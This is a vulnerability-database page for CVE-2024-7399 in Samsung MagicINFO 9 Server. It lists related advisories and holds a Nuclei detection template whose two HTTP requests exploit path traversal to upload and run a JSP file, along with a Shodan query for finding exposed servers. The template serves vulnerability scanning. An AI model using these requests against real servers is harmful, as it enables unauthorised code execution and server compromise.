Vulners
Lucene search
Samsung MagicINFO 9 Server 21.1050.0 - Remote Code Execution
| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
 | The vulnerability of the HttpServletRequest.getParameter() function in the centralized multimedia content management system MagicINFO 9 allows a hacker to execute arbitrary code. | 26 May 202500:00 | – | bdu_fstec |
 | CVE-2024-7399 | 5 May 202519:18 | – | circl |
 | Samsung MagicINFO 9 Server Path Traversal Vulnerability | 24 Apr 202600:00 | – | cisa_kev |
 | CISA Adds Four Known Exploited Vulnerabilities to Catalog | 24 Apr 202612:00 | – | cisa |
 | SAMSUNG MagicINFO 9 Server path traversal vulnerability (CNVD-2025-20807) | 16 Aug 202400:00 | – | cnvd |
 | CVE-2024-7399 | 9 Aug 202404:43 | – | cve |
 | CVE-2024-7399 | 9 Aug 202404:43 | – | cvelist |
 | Exploit for Path Traversal in Samsung Magicinfo_9_Server | 30 May 202515:42 | – | githubexploit |
 | Samsung MagicINFO 9 Server Remote Code Execution (CVE-2024-7399) | 19 May 202518:55 | – | metasploit |
 | CVE-2024-7399 | 12 Aug 202413:38 | – | nvd |
10
| Source | Link |
|---|---|
| nvd | www.nvd.nist.gov/vuln/detail/CVE-2024-7399 |
id: CVE-2024-7399
info:
name: Samsung MagicINFO 9 Server 21.1050.0 - Remote Code Execution
author: iamnoooob,pdresearch
severity: high
description: |
Improper limitation of a pathname to a restricted directory vulnerability in Samsung MagicINFO 9 Server version before 21.1050 allows attackers to write arbitrary file as system authority.
impact: |
Authenticated attackers can exploit path traversal to write arbitrary JSP files with system privileges, achieving remote code execution and complete server compromise.
remediation: |
Update Samsung MagicINFO 9 Server to version 21.1050 or later to address the path traversal and arbitrary file write vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-7399
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2024-7399
cwe-id: CWE-22
epss-score: 0.91941
epss-percentile: 0.99805
cpe: cpe:2.3:a:samsung:magicinfo_9_server:*:*:*:*:*:*:*:*
metadata:
vendor: samsung
product: magicinfo_9_server
verified: true
max-request: 1
shodan-query: 'Server: MagicInfo Premium Server'
tags: cve,cve2024,rce,magicinfo,samsung,file-upload,intrusive,vkev,vuln,kev
flow: http(1) && http(2)
variables:
filename: "{{randbase(6)}}"
input: "{{randstr}}"
http:
- raw:
- |
POST /MagicInfo/servlet/SWUpdateFileUploader?fileName=./../../../../../../server/{{filename}}.jsp&deviceType=abc&deviceModelName=test&swVer=123 HTTP/1.1
Host: {{Hostname}}
Content-Type: text/plain
<%@ page import="java.util.Base64" %>
<%
String base64Input = request.getParameter("input");
if (base64Input != null) {
byte[] decodedBytes = Base64.getDecoder().decode(base64Input);
out.print(new String(decodedBytes));
}
%>
matchers:
- type: status
status:
- 200
internal: true
- raw:
- |
GET /MagicInfo/{{filename}}.jsp?input={{urlencode(base64(input))}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{input}}'
- type: status
status:
- 200
# digest: 4b0a00483046022100c52730b400a04d065adb6a8e5a425734a3bccc4cea97bbcab945721f635b8ae8022100aad80549ddc708691fd4b799312b68b93e805d7d4ec1e1e117c8b35c776edd1c:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
8.9High risk
Vulners AI Score8.9
CVSS 3.18.8 - 9.8
EPSS0.91941
SSVC